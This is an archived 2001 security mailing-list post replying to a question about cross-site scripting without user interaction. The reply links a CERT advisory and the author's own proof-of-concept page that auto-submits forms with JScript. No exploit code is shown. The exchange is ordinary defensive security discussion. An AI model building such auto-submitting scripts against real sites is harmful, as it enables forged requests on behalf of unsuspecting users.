|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Tony Welsh (lists
snowwinter.f2s.com)Date: Tue Oct 23 2001 - 12:59:25 CDT
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
CERT's explanation of Cross-Site woes...
http://www.cert.org/advisories/CA-2000-02.html
or if you want to see an auto-submitter using jscript in action go here (I
wrote it as a proof of the concept to show someone who did not believe it
was possible) and it works scarily well (aside from the 405 error when it
tries to post to a static page) with no extra warnings etc.
http://www.snowwinter.f2s.com/evil.html
- -----Original Message-----
From: Mark Curphey [mailto:markcurphey.com]
Sent: Tuesday, October 23, 2001 7:31 AM
To: webappsecsecurityfocus.com
Subject: Cross Site Scripting with No User Intervention
Does anyone have a really good explanation of how cross site scripting could
work with no user intervention at all...I have seen lots of ways to pass
JavaScript like URL and Unicoded (and OWASP are writing them up) but I
haven't seen a good explanation of how it can be used on a totally innocent
user...all the exploits I have *seen* have involved first tricking the
target into clicking a hyperlink...
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>
Comment: http://www.snowwinter.f2s.com/
iQA/AwUBO9Wv+K0tBy4nR959EQIp/QCZAdLKxbC3+6f3AzKC3VLHfKpt+6EAnRdd
GHzBEUZndi+D2Ccwxi9xJHOl
=q3ST
-----END PGP SIGNATURE-----
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]